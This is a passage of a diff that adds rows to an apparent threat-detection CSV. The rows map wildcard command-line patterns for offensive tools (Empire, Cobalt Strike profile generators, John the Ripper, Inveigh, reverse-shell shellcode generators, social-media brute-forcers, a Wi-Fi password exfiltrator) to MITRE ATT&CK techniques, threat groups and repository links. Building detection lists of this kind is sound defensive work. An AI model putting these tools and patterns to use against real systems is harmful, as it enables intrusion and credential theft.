","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* ImplantSSP.exe*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"* import Exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z"
+"* -ImportDllPathPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts.
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -inc -u=0 *.pwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* -inc=digits *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"* inceptor.*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"* inceptor.spec*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"* --includeModules amass*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* -InFile Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"* informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* informix-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -Injector NtMapViewOfSection*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z"
+"* -Injector VirtualAllocEx*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z"
+"* --input 10m_usernames.txt*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z"
+"* -InputPath .\TrustedForests.txt*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z"
+"* instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z"
+"* instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z"
+"* install *masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z"
+"* install armitage*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets.
recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z"
+"* install autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z"
+"* install backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z"
+"* install chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"* install evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* install github *merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z"
+"* install hekatomb*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z"
+"* install holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"* install krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z"
+"* install nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z"
+"* install wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z"
+"* install wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"* install wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z"
+"* insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z"
+"* intel -d * -whois*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"* interact -u http*://*/*.aspx -p *","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
+"* --interface * --analyze --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* --interface * --analyze --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"* -Internalmonologue -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"* Inveigh-*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z"
+"* invoke admin-service -q *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z"
+"* invoke query *FROM SMS_Admin*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z"
+"* invoke_sessiongopher*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* invoke_vnc*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"* --ip * --port * --type cmd --language *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z"
+"* -ip * -smb2support *lwpshare* ","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002
- T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -IP * -SpooferIP * -HTTP N*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" +"* --ip * --variable shellcode *","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"* ip-forwarding.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-geoplugin.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-ipinfodb.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-map-bing.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-map-google.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-map-kml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-geolocation-maxmind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ip-https-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipidseq.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ipmi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 